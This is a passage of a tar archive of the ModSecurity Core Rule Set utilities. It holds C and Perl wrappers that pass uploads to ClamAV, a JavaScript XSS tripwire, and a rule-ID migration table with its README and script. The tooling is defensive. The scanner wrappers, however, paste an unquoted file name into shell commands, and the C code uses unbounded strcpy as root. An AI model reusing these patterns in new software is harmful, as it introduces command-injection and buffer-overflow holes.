strcpy(data_disk_space,parameters[idx].value); if ((idx = find_param_idx("CONN_RATE",parameters,num_of_params)) >= 0) strcpy(conn_rate,parameters[idx].value); if ((idx = find_param_idx("CONN_RATE_PER_ADDR",parameters,num_of_params)) >= 0) strcpy(conn_rate_per_addr,parameters[idx].value); if ((idx = find_param_idx("CONNS",parameters,num_of_params)) >= 0) strcpy(conns,parameters[idx].value); if ((idx = find_param_idx("CONNS_PER_ADDR",parameters,num_of_params)) >= 0) strcpy(conns_per_addr,parameters[idx].value); if ((idx = find_param_idx("MODSEC_RPC",parameters,num_of_params)) >= 0) strcpy(modsec_rpc,parameters[idx].value); if ((idx = find_param_idx("MODSEC_PROXY",parameters,num_of_params)) >= 0) strcpy(modsec_proxy,parameters[idx].value); if ((idx = find_param_idx("MODSEC_PROXY_SCRIPT",parameters,num_of_params)) >= 0) strcpy(modsec_proxy_script,parameters[idx].value); return num_of_params; } int init_cgi() { char *modsec; setresuid(0,0,0); setresgid(0,0,0); strcpy(modsec_cli_home,"/opt/modsecurity-cli"); strcpy(modsec_rpc_home,"/opt/modsecurity-rpc"); strcpy(modsec_rpc_log_file,"/opt/modsecurity-rpc/var/logs/rpc.log"); strcpy(modsec_rpc_log_level,"0"); strcpy(modsec_rpc_ssl_lockfile,"/opt/modsecurity-rpc/var/run/ssl.lock"); strcpy(modsec_rpc_sensor_lockfile,"/opt/modsecurity-rpc/var/run/sensor.lock"); strcpy(modsec_rpc_externalnic_lockfile,"/opt/modsecurity-rpc/var/run/externalnic.lock"); strcpy(modsec_rpc_reverseproxy_lockfile,"/opt/modsecurity-rpc/var/run/reverseproxy.lock"); strcpy(modsec_rpc_mui_lockfile,"/opt/modsecurity-rpc/var/run/mui.lock"); strcpy(modsec_proxy_home,"/opt/modsecurity-proxy"); strcpy(modsec_proxy_ip,"127.0.0.2"); strcpy(modsec_proxy_port,"80"); strcpy(modsec_proxy_bin,"/bin/modsec-proxyd"); strcpy(modsec_proxy_script,"/etc/init.d/modsec-proxy"); strcpy(modsec_proxy_conf,"/etc/httpd.conf"); strcpy(modsec_proxy_ext_nic,"eth0"); strcpy(modsec_proxy_network_prefix,"172.16.0.0/12"); strcpy(modsec_proxy_pid,"/opt/modsecurity-proxy/var/run/httpd.pid"); strcpy(modsec_proxy_whitelist,"/opt/breach/etc/modsec_whitelist.conf"); strcpy(modsec_proxy_blacklist,"/opt/breach/etc/modsec_blacklist.conf"); strcpy(modsec_proxy_timeout,"120"); strcpy(modsec_proxy_exchange,"/opt/modsecurity-proxy/var/exchange"); strcpy(modsec_proxy_ext_ips,"/opt/breach/etc/modsec_ips.conf"); strcpy(modsec_mui_ui_ipaddress,"127.0.0.1"); strcpy(modsec_mui_ui_port,"443"); strcpy(modsec_rpc_password_file,"/opt/modsecurity-rpc/etc/.htpasswd"); strcpy(modsec_mui_ui_admin,"admin"); strcpy(sensor_id,"1"); strcpy(serial,"1"); strcpy(version_number,"2.0"); strcpy(bridge_mode,"off"); strcpy(data_disk_space,"60"); strcpy(release_date,"11-15-2006"); strcpy(conn_rate,"0"); strcpy(conn_rate_per_addr,"0"); strcpy(conns,"0"); strcpy(conns_per_addr,"0"); if (modsec = getenv("MODSEC")) read_conf_file(modsec); else { if (!read_conf_file("/opt/breach/etc/modsec.conf")) read_conf_file("/etc/modsec.conf"); } return 0; } ������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/av-scanning/runAV/common.h�����������������������������������������������0000775�0000000�0000000�00000006765�14461225151�0022555�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#include #include #include #include #include #include #include #include #include #include #include #include #include #define MAX_PARAMS 256 #define MAX_IPS 256 #define MAX_NAME_LENGTH 256 #define MAX_VALUE_LENGTH 1024 #define MAX_CMD_LENGTH 1024 #define MAX_TOKEN_LENGTH 1024 #define MAX_OUTPUT_LINE_LEN (1024) #define MAX_OUTPUT_SIZE (MAX_OUTPUT_LINE_LEN*1024) #define WHITE 1 #define BLACK 0 #define NONE 0 #define DEBUG 1 typedef struct { char name[MAX_NAME_LENGTH]; char value[MAX_VALUE_LENGTH]; } parameter_t; typedef struct { char ip[16]; time_t start; long duration; time_t end; char token[MAX_TOKEN_LENGTH]; } blocklist_t; EXTERN int lock_file(char *filename); EXTERN int unlock_file(int fd); EXTERN int print_reply(char *reply); EXTERN int print_error(char *func1, char* func2, char* str, int err); EXTERN int print_request(char* url,char *command,parameter_t *parameters, int num_of_parameters, int mask); EXTERN int print_request_force(char* url,char *command,parameter_t *parameters, int num_of_parameters, int mask); EXTERN int is_proxy_up(); EXTERN int run_cmd(char *command, char *output, int output_size); EXTERN int parse_cli (parameter_t *parameters, int max_parameters, int num_of_args, char *args[]); EXTERN int parse_query_and_body(parameter_t *parameters, int max_parameters); EXTERN int parse_query(char *query, parameter_t *parameters, int max_parameters); EXTERN int parse_file(char *filename, parameter_t *parameters, int max_parameters); EXTERN int copy_file(char *src_file, char *dst_file); EXTERN int change_file(char *filename, parameter_t parameter); EXTERN int find_param_idx(char *parameter_name, parameter_t *parameters, int max_parameters); EXTERN int init_cgi(); EXTERN int send_request(char *request,char *ip,char *port,char *reply,int max_reply_size); EXTERN int find_ip_idx(char *ip, blocklist_t *blocklist, int num_of_ips); EXTERN int remove_ip_idx(char *ip, blocklist_t *blocklist, int num_of_ips); EXTERN char modsec_rpc[1024]; EXTERN char modsec_rpc_home[1024]; EXTERN char modsec_rpc_log_file[1024]; EXTERN char modsec_rpc_log_level[1024]; EXTERN char modsec_rpc_ssl_lockfile[1024]; EXTERN char modsec_rpc_externalnic_lockfile[1024]; EXTERN char modsec_rpc_sensor_lockfile[1024]; EXTERN char modsec_rpc_reverseproxy_lockfile[1024]; EXTERN char modsec_rpc_mui_lockfile[1024]; EXTERN char modsec_proxy[1024]; EXTERN char modsec_proxy_home[1024]; EXTERN char modsec_proxy_script[1024]; EXTERN char modsec_proxy_ip[1024]; EXTERN char modsec_proxy_port[1024]; EXTERN char modsec_proxy_bin[1024]; EXTERN char modsec_proxy_conf[1024]; EXTERN char modsec_proxy_ext_nic[1024]; EXTERN char modsec_proxy_pid[1024]; EXTERN char modsec_proxy_whitelist[1024]; EXTERN char modsec_proxy_blacklist[1024]; EXTERN char modsec_proxy_network_prefix[1024]; EXTERN char modsec_proxy_timeout[1024]; EXTERN char modsec_proxy_exchange[1024]; EXTERN char modsec_proxy_ext_ips[1024]; EXTERN char modsec_rpc_password_file[1024]; EXTERN char modsec_mui_ui_admin[1024]; EXTERN char modsec_mui_ui_ipaddress[1024]; EXTERN char modsec_mui_ui_port[1024]; EXTERN char modsec_cli_home[1024]; EXTERN char sensor_id[1024]; EXTERN char serial[1024]; EXTERN char version_number[1024]; EXTERN char bridge_mode[1024]; EXTERN char data_disk_space[1024]; EXTERN char release_date[1024]; EXTERN char conn_rate[1024]; EXTERN char conn_rate_per_addr[1024]; EXTERN char conns[1024]; EXTERN char conns_per_addr[1024]; �����������modsecurity-crs-3.3.5/util/av-scanning/runAV/comp���������������������������������������������������0000775�0000000�0000000�00000000124�14461225151�0021754�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������gcc -c -o common.o -DEXTERN= common.c gcc -o runAV -DEXTERN=extern common.o runAV.c ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/av-scanning/runAV/runAV-clamd.c������������������������������������������0000775�0000000�0000000�00000002367�14461225151�0023363�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#include "common.h" main(int argc, char *argv[]) { char cmd[MAX_OUTPUT_SIZE]; char output[MAX_OUTPUT_SIZE]; int error; char *colon; char *keyword; if (argc > 1) { sprintf (cmd, "/usr/bin/clamdscan --no-summary %s", argv[1]); output[0] = '\0'; error = run_cmd(cmd,output,MAX_OUTPUT_SIZE); if (error != 0) { printf ("1 exec error %d: OK", error); } else if (!*output) { printf ("1 exec empty: OK"); } else { colon = strstr(output, ":"); if (colon) { colon += 2; } if (!colon) { printf ("0 unable to parse clamdscan output [%s] for cmd [%s]", output, cmd); } else if (keyword = strstr(colon, " FOUND")) { *keyword = '\0'; printf ("0 clamdscan: %s", colon); } else if (keyword = strstr(colon, " ERROR")) { *keyword = '\0'; printf ("0 clamdscan: %s", colon); } else if (keyword = strstr(colon, "OK")) { printf ("1 clamdscan: OK"); } else if (keyword = strstr(colon, "Empty file")) { printf ("1 empty file"); } else if (keyword = strstr(colon, "Can't access file ")) { printf ("0 invalid file %s", keyword+18); } else { printf ("0 unable to parse clamdscan output [%s] for cmd [%s]", output, cmd); } } } } �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/av-scanning/runAV/runAV.c������������������������������������������������0000775�0000000�0000000�00000002361�14461225151�0022277�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#include "common.h" main(int argc, char *argv[]) { char cmd[MAX_OUTPUT_SIZE]; char output[MAX_OUTPUT_SIZE]; int error; char *colon; char *keyword; if (argc > 1) { sprintf (cmd, "/usr/bin/clamscan --no-summary %s", argv[1]); output[0] = '\0'; error = run_cmd(cmd,output,MAX_OUTPUT_SIZE); if (error != 0) { printf ("1 exec error %d: OK", error); } else if (!*output) { printf ("1 exec empty: OK"); } else { colon = strstr(output, ":"); if (colon) { colon += 2; } if (!colon) { printf ("0 unable to parse clamscan output [%s] for cmd [%s]", output, cmd); } else if (keyword = strstr(colon, " FOUND")) { *keyword = '\0'; printf ("0 clamscan: %s", colon); } else if (keyword = strstr(colon, " ERROR")) { *keyword = '\0'; printf ("0 clamscan: %s", colon); } else if (keyword = strstr(colon, "OK")) { printf ("1 clamscan: OK"); } else if (keyword = strstr(colon, "Empty file")) { printf ("1 empty file"); } else if (keyword = strstr(colon, "Can't access file ")) { printf ("0 invalid file %s", keyword+18); } else { printf ("0 unable to parse clamscan output [%s] for cmd [%s]", output, cmd); } } } } �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/av-scanning/runav.pl�����������������������������������������������������0000775�0000000�0000000�00000001503�14461225151�0021532�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/perl # # runav.pl # Copyright (c) 2004-2011 Trustwave # # This script is an interface between ModSecurity and its # ability to intercept files being uploaded through the # web server, and ClamAV $CLAMSCAN = "clamscan"; if ($#ARGV != 0) { print "Usage: modsec-clamscan.pl \n"; exit; } my ($FILE) = shift @ARGV; $cmd = "$CLAMSCAN --stdout --disable-summary $FILE"; $input = `$cmd`; $input =~ m/^(.+)/; $error_message = $1; $output = "0 Unable to parse clamscan output [$1]"; if ($error_message =~ m/: Empty file\.?$/) { $output = "1 empty file"; } elsif ($error_message =~ m/: (.+) ERROR$/) { $output = "0 clamscan: $1"; } elsif ($error_message =~ m/: (.+) FOUND$/) { $output = "0 clamscan: $1"; } elsif ($error_message =~ m/: OK$/) { $output = "1 clamscan: OK"; } print "$output\n"; ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/browser-tools/�����������������������������������������������������������0000775�0000000�0000000�00000000000�14461225151�0020455�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/browser-tools/js-overrides.js��������������������������������������������0000664�0000000�0000000�00000004364�14461225151�0023436�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������(function() { // don't leak XSSTripwire into global ns /* Assumptions: - we need to run first, before any other attacker script - we can't prevent tripwire from being detected (e.g. by side effects) Todo: - a lot more in lockdown - protect XHR */ var XSSTripwire = new Object(); XSSTripwire.report = function() { // Notify server var notify = XSSTripwire.newXHR(); // Create a results string to send back var results; try { results = "HTML=" + encodeURIComponent(document.body.outerHTML); } catch (e) {} // we don't always have document.body notify.open("POST", XSSTripwire.ReportURL, true); notify.setRequestHeader("Content-Type","application/x-www-form-urlencoded"); notify.send(results); } XSSTripwire.lockdown = function(obj, name) { if (Object.defineProperty) { Object.defineProperty(obj, name, { configurable: false }) } } XSSTripwire.newXHR = function() { var xmlreq = false; if (window.XMLHttpRequest) { xmlreq = new XMLHttpRequest(); } else if (window.ActiveXObject) { // Try ActiveX try { xmlreq = new ActiveXObject("Msxml2.XMLHTTP"); } catch (e1) { // first method failed try { xmlreq = new ActiveXObject("Microsoft.XMLHTTP"); } catch (e2) { // both methods failed } } } return xmlreq; }; XSSTripwire.proxy = function(obj, name, report_function_name, exec_original) { var proxy = obj[name]; obj[name] = function() { // URL of the page to notify, in the event of a detected XSS event: XSSTripwire.ReportURL = "xss-tripwire-report?function=" + encodeURIComponent(report_function_name); XSSTripwire.report(); if (exec_original) { return proxy.apply(this, arguments); } }; XSSTripwire.lockdown(obj, name); }; XSSTripwire.proxy(window, 'alert', 'window.alert', true); XSSTripwire.proxy(window, 'confirm', 'window.confirm', true); XSSTripwire.proxy(window, 'prompt', 'window.prompt', true); XSSTripwire.proxy(window, 'unescape', 'unescape', true); XSSTripwire.proxy(document, 'write', 'document.write', true); XSSTripwire.proxy(String, 'fromCharCode', 'String.fromCharCode', true); })(); ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/crs2-renumbering/��������������������������������������������������������0000775�0000000�0000000�00000000000�14461225151�0021020�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/crs2-renumbering/IdNumbering.csv�����������������������������������������0000664�0000000�0000000�00000036770�14461225151�0023755�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������200000,000000 200121,000000 200273,000000 200280,000000 200281,000000 200287,000000 200289,000000 200290,000000 200299,000000 200316,000000 200333,000000 200337,000000 200350,000000 200351,000000 200366,000000 200367,000000 200368,000000 200369,000000 200370,000000 200371,000000 200372,000000 200373,000000 200374,000000 200375,000000 200376,000000 200377,000000 200378,000000 200379,000000 200381,000000 200382,000000 200383,000000 200384,000000 200385,000000 200386,000000 200387,000000 200388,000000 200389,000000 200390,000000 200391,000000 200392,000000 200394,000000 200395,000000 200396,000000 200397,000000 200398,000000 200399,000000 200400,000000 200401,000000 200402,000000 200403,000000 200404,000000 200405,000000 200406,000000 200407,000000 200408,000000 200409,000000 200410,000000 200411,000000 200412,000000 200413,000000 200414,000000 200415,000000 200416,000000 200417,000000 200418,000000 200419,000000 200420,000000 200421,000000 200422,000000 200423,000000 200424,000000 200425,000000 200426,000000 200427,000000 200428,000000 200429,000000 200430,000000 200431,000000 200432,000000 200433,000000 200434,000000 200435,000000 200436,000000 200437,000000 200438,000000 200439,000000 200440,000000 200441,000000 200442,000000 200443,000000 200445,000000 200446,000000 200447,000000 200448,000000 200449,000000 200450,000000 200451,000000 200452,000000 200453,000000 200454,000000 200455,000000 200456,000000 200457,000000 200458,000000 200459,000000 200460,000000 200461,000000 200462,000000 200463,000000 200464,000000 200465,000000 200466,000000 200467,000000 200468,000000 200469,000000 200470,000000 200471,000000 200472,000000 200473,000000 200474,000000 200475,000000 200476,000000 200477,000000 200478,000000 200479,000000 200480,000000 200481,000000 200482,000000 200483,000000 200484,000000 200485,000000 200486,000000 200487,000000 200488,000000 200489,000000 200490,000000 200491,000000 200492,000000 200493,000000 200494,000000 200495,000000 200496,000000 200497,000000 200498,000000 200499,000000 200500,000000 200501,000000 200502,000000 200503,000000 200504,000000 200505,000000 200506,000000 200507,000000 200508,000000 200509,000000 200510,000000 200511,000000 200512,000000 200513,000000 200514,000000 200515,000000 200516,000000 200517,000000 200518,000000 200519,000000 200520,000000 200521,000000 200522,000000 200523,000000 200524,000000 200525,000000 200526,000000 200527,000000 200528,000000 200529,000000 200530,000000 200532,000000 200533,000000 200534,000000 200535,000000 200536,000000 200537,000000 200538,000000 200539,000000 200540,000000 200541,000000 200542,000000 200543,000000 200544,000000 200545,000000 200546,000000 200547,000000 200548,000000 200549,000000 200550,000000 200551,000000 200552,000000 200553,000000 200554,000000 200555,000000 200556,000000 200557,000000 200558,000000 200559,000000 200560,000000 200561,000000 200562,000000 200563,000000 200564,000000 200565,000000 200566,000000 200567,000000 200568,000000 200569,000000 200570,000000 200571,000000 200572,000000 200573,000000 200574,000000 200575,000000 200576,000000 200577,000000 200578,000000 200579,000000 200580,000000 200581,000000 200582,000000 200583,000000 200584,000000 200585,000000 200586,000000 200587,000000 200588,000000 200589,000000 200590,000000 200591,000000 200592,000000 200593,000000 200594,000000 200595,000000 200596,000000 200597,000000 200598,000000 200599,000000 200600,000000 200601,000000 200602,000000 200603,000000 200604,000000 200605,000000 200606,000000 200607,000000 200608,000000 200609,000000 200610,000000 200611,000000 200612,000000 200613,000000 200614,000000 200615,000000 200616,000000 200617,000000 200618,000000 200619,000000 200620,000000 200621,000000 200622,000000 200623,000000 200624,000000 200625,000000 200626,000000 200627,000000 200628,000000 200629,000000 200630,000000 200631,000000 200632,000000 200633,000000 200634,000000 200635,000000 200645,000000 200646,000000 200647,000000 200648,000000 200649,000000 200650,000000 200651,000000 200652,000000 200653,000000 200654,000000 200655,000000 200656,000000 200657,000000 200658,000000 200659,000000 200660,000000 200661,000000 200662,000000 200663,000000 200664,000000 200665,000000 200666,000000 200667,000000 200668,000000 200669,000000 200670,000000 200671,000000 200673,000000 200674,000000 200675,000000 200676,000000 200677,000000 200678,000000 200679,000000 200680,000000 200681,000000 200682,000000 200683,000000 200684,000000 200685,000000 200686,000000 200687,000000 200688,000000 200689,000000 200690,000000 200692,000000 200693,000000 200694,000000 200695,000000 200696,000000 200697,000000 200698,000000 200699,000000 200700,000000 200701,000000 200702,000000 200703,000000 200704,000000 200705,000000 200706,000000 200707,000000 200708,000000 200709,000000 200710,000000 200711,000000 200712,000000 200713,000000 200714,000000 200718,000000 200719,000000 200720,000000 200721,000000 200722,000000 200723,000000 200724,000000 200725,000000 200726,000000 200727,000000 200728,000000 200729,000000 200730,000000 200731,000000 200732,000000 200733,000000 200734,000000 200735,000000 200736,000000 200737,000000 200738,000000 200739,000000 200740,000000 200741,000000 200742,000000 200743,000000 200744,000000 200745,000000 200746,000000 200747,000000 200748,000000 200749,000000 200751,000000 200752,000000 200753,000000 200754,000000 200755,000000 200756,000000 200789,000000 200865,000000 200868,000000 200872,000000 200882,000000 200883,000000 200884,000000 200885,000000 200887,000000 200888,000000 200889,000000 200890,000000 200892,000000 200893,000000 200896,000000 200897,000000 200899,000000 200901,000000 200905,000000 200906,000000 200907,000000 200908,000000 200910,000000 200912,000000 200914,000000 200916,000000 200917,000000 200918,000000 200919,000000 200922,000000 200923,000000 200930,000000 200931,000000 200932,000000 200933,000000 200936,000000 200937,000000 200938,000000 200939,000000 200941,000000 200942,000000 200943,000000 200945,000000 200946,000000 200950,000000 200959,000000 200964,000000 200965,000000 200966,000000 200967,000000 200969,000000 200971,000000 200972,000000 200973,000000 200974,000000 200975,000000 200976,000000 200978,000000 200979,000000 200983,000000 200984,000000 200987,000000 200988,000000 200989,000000 200990,000000 200991,000000 200992,000000 200993,000000 200994,000000 200995,000000 200996,000000 200997,000000 200999,000000 201001,000000 201002,000000 201003,000000 201004,000000 201007,000000 201008,000000 201009,000000 201012,000000 201013,000000 201014,000000 201016,000000 201017,000000 201018,000000 201019,000000 201020,000000 201022,000000 201025,000000 201026,000000 201027,000000 201034,000000 201035,000000 201036,000000 201046,000000 201047,000000 201048,000000 201055,000000 201056,000000 201061,000000 201062,000000 201063,000000 201064,000000 201065,000000 201066,000000 201070,000000 201071,000000 201072,000000 201075,000000 201077,000000 201078,000000 201080,000000 201083,000000 201084,000000 201085,000000 201086,000000 201092,000000 201094,000000 201095,000000 201097,000000 201098,000000 201099,000000 201100,000000 201101,000000 201102,000000 201104,000000 201105,000000 201106,000000 201107,000000 201108,000000 201109,000000 201110,000000 201111,000000 201113,000000 201114,000000 201115,000000 201116,000000 201117,000000 201119,000000 201120,000000 201121,000000 201125,000000 201126,000000 201127,000000 201137,000000 201138,000000 201142,000000 201145,000000 201155,000000 201156,000000 201157,000000 201166,000000 201167,000000 201172,000000 201173,000000 201182,000000 201183,000000 201184,000000 201185,000000 201187,000000 201188,000000 201192,000000 201193,000000 201194,000000 201195,000000 201200,000000 201201,000000 201202,000000 201203,000000 201204,000000 201206,000000 201207,000000 201209,000000 201212,000000 201213,000000 201216,000000 201218,000000 201219,000000 201221,000000 201222,000000 201233,000000 201234,000000 201235,000000 201236,000000 201237,000000 201238,000000 201239,000000 201240,000000 201241,000000 201242,000000 201243,000000 201247,000000 201248,000000 201249,000000 201256,000000 201257,000000 201258,000000 201260,000000 201265,000000 201266,000000 201267,000000 201268,000000 201269,000000 201270,000000 201271,000000 201272,000000 201274,000000 201275,000000 201279,000000 201282,000000 201283,000000 201287,000000 201288,000000 201294,000000 201295,000000 201299,000000 201308,000000 201309,000000 201310,000000 201311,000000 201312,000000 201313,000000 201315,000000 201322,000000 201323,000000 201330,000000 201331,000000 201342,000000 201343,000000 201346,000000 201347,000000 900001,000000 900002,000000 900003,000000 900004,000000 900005,000000 900006,000000 900007,000000 900008,000000 900009,000000 900010,000000 900011,000000 900012,000000 900013,000000 900014,000000 900015,000000 900016,000000 900017,000000 900018,000000 900019,000000 900020,000000 900021,000000 900030,000000 900031,000000 900032,000000 900033,000000 900034,000000 900035,000000 900036,000000 900037,000000 900038,000000 900039,000000 900040,000000 900041,000000 900042,000000 900043,000000 900044,000000 900045,000000 900046,000000 900047,000000 900048,000000 900050,910100 900051,910110 900051,910120 910006,000000 910007,000000 910008,000000 920005,000000 920006,000000 920007,000000 920008,000000 920009,000000 920010,000000 920011,000000 920012,000000 920013,000000 920014,000000 920015,000000 920016,000000 920017,000000 920018,000000 920019,000000 920020,000000 920021,000000 920022,000000 920023,000000 950000,943120 950001,942150 950002,000000 950003,943110 950005,930120 950006,000000 950007,000000 950008,000000 950009,943100 950010,000000 950011,000000 950012,921100 950018,000000 950019,000000 950020,000000 950103,930100 950104,930110 950107,920220 950108,920240 950109,920230 950110,000000 950115,000000 950116,920260 950117,931100 950118,931110 950119,931120 950120,931130 950801,920250 950901,942130 950907,932100 950908,000000 950910,921120 950911,921130 950912,921140 950913,921150 950914,921160 950915,921110 950921,000000 950922,000000 950923,000000 958000,000000 958001,000000 958002,000000 958003,000000 958004,000000 958005,000000 958006,000000 958007,000000 958008,000000 958009,000000 958010,000000 958011,000000 958012,000000 958013,000000 958016,000000 958017,000000 958018,000000 958019,000000 958020,000000 958022,000000 958023,000000 958024,000000 958025,000000 958026,000000 958027,000000 958028,000000 958030,000000 958031,000000 958032,000000 958033,000000 958034,000000 958036,000000 958037,000000 958038,000000 958039,000000 958040,000000 958041,000000 958045,000000 958046,000000 958047,000000 958049,000000 958051,000000 958052,000000 958054,000000 958056,000000 958057,000000 958059,000000 958230,920190 958231,920200 958291,000000 958295,920210 958297,000000 958404,000000 958405,000000 958406,000000 958407,000000 958408,000000 958409,000000 958410,000000 958411,000000 958412,000000 958413,000000 958414,000000 958415,000000 958416,000000 958417,000000 958418,000000 958419,000000 958420,000000 958421,000000 958422,000000 958423,000000 958976,000000 958977,933110 958978,933000 958979,933120 958980,933130 959070,942380 959071,942390 959072,942400 959073,942410 959151,933100 960000,920120 960001,000000 960002,000000 960003,000000 960006,920330 960007,920290 960008,920280 960009,920320 960010,920420 960011,920170 960012,920180 960014,000000 960015,920300 960016,920160 960017,920350 960018,000000 960020,000000 960021,920310 960022,000000 960024,942460 960032,911100 960034,920430 960035,920440 960038,920450 960208,920370 960209,920360 960335,920380 960341,920390 960342,920400 960343,920410 960901,920270 960902,000000 960904,920340 960911,920100 960912,920130 960913,000000 960914,920140 960915,920150 970003,951100 970004,954120 970007,000000 970008,000000 970009,953100 970010,000000 970011,000000 970012,000000 970013,950130 970014,952100 970015,953110 970016,000000 970017,952110 970017,954100 970018,000000 970021,000000 970118,954110 970901,950100 970902,953120 970903,000000 970904,954130 973300,941320 973301,000000 973302,000000 973303,000000 973304,000000 973305,000000 973306,000000 973307,000000 973308,000000 973309,000000 973310,000000 973311,000000 973312,000000 973313,000000 973314,000000 973315,941190 973316,000000 973317,941300 973318,941290 973319,941310 973320,941280 973321,941270 973322,941250 973323,941240 973324,941230 973325,000000 973326,941200 973327,000000 973328,000000 973329,000000 973330,000000 973331,000000 973332,941330 973333,941340 973334,000000 973335,000000 973336,941110 973337,941120 973338,941140 973339,941130 973340,941160 973341,941170 973342,941180 973343,941100 973344,941100 973345,941220 973346,941210 973347,000000 973348,941260 973350,941150 981000,000000 981001,000000 981003,000000 981004,000000 981005,000000 981006,000000 981007,000000 981018,000000 981020,901100 981021,901110 981022,000000 981033,000000 981034,000000 981035,000000 981036,000000 981037,000000 981038,000000 981039,000000 981040,000000 981041,000000 981042,000000 981043,000000 981044,912120 981045,912130 981046,912140 981047,912150 981048,912160 981049,912170 981050,000000 981051,000000 981052,000000 981053,000000 981054,000000 981055,000000 981056,000000 981057,000000 981058,000000 981059,000000 981060,000000 981061,000000 981062,000000 981063,000000 981064,000000 981075,000000 981076,000000 981077,000000 981078,000000 981079,000000 981080,000000 981081,000000 981082,000000 981083,000000 981084,000000 981085,000000 981086,000000 981087,000000 981088,000000 981089,000000 981090,000000 981091,000000 981092,000000 981093,000000 981094,000000 981095,000000 981096,000000 981097,000000 981098,000000 981099,000000 981100,000000 981101,000000 981102,000000 981103,000000 981104,000000 981105,000000 981110,000000 981131,000000 981132,000000 981133,000000 981134,000000 981136,000000 981137,000000 981138,910140 981139,910190 981140,910000 981141,910150 981142,910160 981143,910170 981144,910180 981145,000000 981172,942420 981173,942430 981175,949100 981176,949190 981177,000000 981178,000000 981179,949110 981180,949120 981181,949130 981182,949140 981183,949150 981184,949160 981185,000000 981186,949170 981187,949180 981188,000000 981189,000000 981190,000000 981191,000000 981192,000000 981193,000000 981194,000000 981195,000000 981196,000000 981197,000000 981198,000000 981199,000000 981200,959100 981201,980100 981202,980110 981203,980120 981204,980130 981205,980140 981219,000000 981220,000000 981221,000000 981222,000000 981223,000000 981224,000000 981227,920110 981228,000000 981229,000000 981230,000000 981231,942440 981235,000000 981236,000000 981237,000000 981238,000000 981239,000000 981240,942300 981241,942230 981242,942330 981243,942370 981244,942180 981245,942260 981246,942340 981247,942360 981248,942210 981249,942310 981250,942170 981251,942350 981252,942240 981253,942320 981254,942280 981255,942190 981256,942250 981257,942200 981260,942450 981261,942100 981270,942290 981272,942160 981276,942270 981277,942220 981300,000000 981301,000000 981302,000000 981303,000000 981304,000000 981305,000000 981306,000000 981307,000000 981308,000000 981309,000000 981310,000000 981311,000000 981312,000000 981313,000000 981314,000000 981315,000000 981316,000000 981317,000000 981318,942110 981319,942120 981320,942140 981400,000000 981401,000000 981402,000000 981403,000000 981404,000000 981405,000000 981406,000000 981407,000000 990002,913100 990012,000000 990901,913110 990902,913120 999003,000000 999004,000000 999005,000000 999006,000000 999008,000000 999010,000000 999011,000000 9700010,951110 9700011,951120 9700012,951130 9700013,951140 9700014,951150 9700015,951160 9700016,951170 9700017,951180 9700018,951190 9700019,951200 9700020,951210 9700021,951220 9700022,951230 9700023,951240 9700024,951250 9700025,951260 ��������modsecurity-crs-3.3.5/util/crs2-renumbering/README��������������������������������������������������0000664�0000000�0000000�00000002522�14461225151�0021701�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������CRS 2.x to 3.x migration utility ================================ In CRS 3.0, we have renumbered the rules to be more logical and helpful. The new rule file names now correspond with the rule IDs in the file. First rule of a given file is usually 9XX100, then the rules continue in steps of ten. Related rules/siblings follow with a single digit change (9XX101, etc.). This utility replaces CRS 2 ruleIds with their CRS 3 counterparts. You can use it when migrating your CRS 2 exclusion/.conf files to CRS 3.0 or higher. Example usage: ./update.py -f your_old_modsec_conf.conf Rules which have been removed in CRS 3 are listed with the new ID 000000 in the CSV file. This means that the former rule is no longer part of CRS 3. If after replacement you find a string 000000 in your config files, you can likely remove that exclusion or special case. If you want to create your own tooling for this migration, you can use the file idNumbering.csv in this directory. It lists the old rule IDs of CRS 2.2, together with the corresponding rule IDs in CRS 3.0. A rule renumbering is painful for all existing installations. But we really think that the rule IDs lacked sense and reason, and we are confident future maintenance will be much easier once this is done. We do not plan to change rule IDs after this. We appreciate your understanding in this matter. ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/crs2-renumbering/update.py�����������������������������������������������0000775�0000000�0000000�00000003453�14461225151�0022664�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/env python # -*- coding: utf-8 -*- """This is designed to convert 2.x CRS ID numbering to 3.x CRS numbering""" from __future__ import print_function import csv import argparse import os import sys def main(): """Main function that contains all the logic to relabel CRS IDs""" id_translation_file = os.path.join(sys.path[0], "IdNumbering.csv") if not os.path.isfile(id_translation_file): sys.stderr.write("We were unable to locate the ID translation CSV 